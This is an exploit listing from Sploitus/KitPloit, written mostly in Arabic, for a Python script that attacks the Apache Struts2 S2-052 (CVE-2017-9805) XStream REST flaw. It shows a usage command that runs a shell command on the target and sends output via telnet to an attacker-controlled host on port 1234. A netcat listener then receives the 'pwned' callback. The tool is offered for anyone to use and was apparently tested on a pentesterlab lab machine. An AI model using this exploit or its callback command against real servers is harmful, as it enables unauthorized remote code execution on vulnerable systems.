Sploitus

Exploit for -CVE-2017-9805

kitploit · 2026-08-25

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0X00-0X00--CVE-2017-9805
# معلومات الثغرة

المصادر: * https://vulners.com/cve/CVE-2017-9805

# ما هذا؟

نص برمجي بايثون لاستغلال الثغرات قادر على تنفيذ أوامر عن بعد في واجهة النظام الذي يستضيف Struts2 المعرض لـ S2-052.

# الاستخدام

╭─root@blackshell ~/  
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

root@kitploit:~
    
    
    [*] Apache Struts XStream REST vulnerability - S2-052
    [*] Creating payload ...
    [*] Exploit packet has 2582 bytes.
    [*] Sending exploit packet ...
    [+] Exploit packet has been sent.
    

╭─zc00l@blackshell ~/  
╰─$ nc -lvp 1234

root@kitploit:~
    
    
    listening on [any] 1234 ...
    connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
    pwned
    

تم اختباره على آلة pentesterlab المعرضة للخطر في التمرين s2-052.

# حقوق المؤلف

تمت كتابة هذا النص البرمجي للاستغلال من قبلي (zc00l) ويمكن لأي شخص استخدامه.